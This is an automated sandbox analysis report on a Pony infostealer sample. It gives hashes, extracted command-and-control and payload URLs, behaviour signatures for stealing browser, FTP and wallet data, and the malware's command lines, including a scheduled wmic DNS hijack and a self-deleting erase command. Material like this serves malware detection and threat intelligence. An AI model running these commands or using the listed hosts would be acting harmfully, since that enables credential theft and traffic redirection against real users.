Analysis
-
max time kernel
103s -
max time network
77s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
20/11/2022, 08:34
Static task
static1
Behavioral task
behavioral1
Sample
66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
Resource
win7-20221111-en
General
-
Target
66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
-
Size
81KB
-
MD5
1535bd3f07b9163e3f8c1105318e4fa0
-
SHA1
bd6a3c48c57af869ab047d677b2e12623da2b2cf
-
SHA256
66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c
-
SHA512
d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5
-
SSDEEP
1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy
Malware Config
Extracted
pony
http://voladex.pw:36/fix/mark.php
http://bolakes.pw:36/fix/refer.php
http://camtest33.pw:36/fix/symbols.php
-
payload_url
http://camtest3.pw:36/fix/Sonar.exe
Signatures
-
Deletes itself 1 IoCs
pid Process 364 cmd.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1724 set thread context of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\calc2.exe 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 924 PING.EXE -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeImpersonatePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeImpersonatePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeTcbPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeChangeNotifyPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeCreateTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeBackupPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeRestorePrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeIncreaseQuotaPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe Token: SeAssignPrimaryTokenPrivilege 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1724 wrote to memory of 1476 1724 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 27 PID 1476 wrote to memory of 328 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 28 PID 1476 wrote to memory of 328 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 28 PID 1476 wrote to memory of 328 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 28 PID 1476 wrote to memory of 328 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 28 PID 328 wrote to memory of 1812 328 cmd.exe 30 PID 328 wrote to memory of 1812 328 cmd.exe 30 PID 328 wrote to memory of 1812 328 cmd.exe 30 PID 328 wrote to memory of 1812 328 cmd.exe 30 PID 1476 wrote to memory of 364 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 31 PID 1476 wrote to memory of 364 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 31 PID 1476 wrote to memory of 364 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 31 PID 1476 wrote to memory of 364 1476 66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe 31 PID 364 wrote to memory of 924 364 cmd.exe 33 PID 364 wrote to memory of 924 364 cmd.exe 33 PID 364 wrote to memory of 924 364 cmd.exe 33 PID 364 wrote to memory of 924 364 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c at 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")3⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\SysWOW64\at.exeat 09:38:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")4⤵PID:1812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost4⤵
- Runs ping.exe
PID:924
-
-
-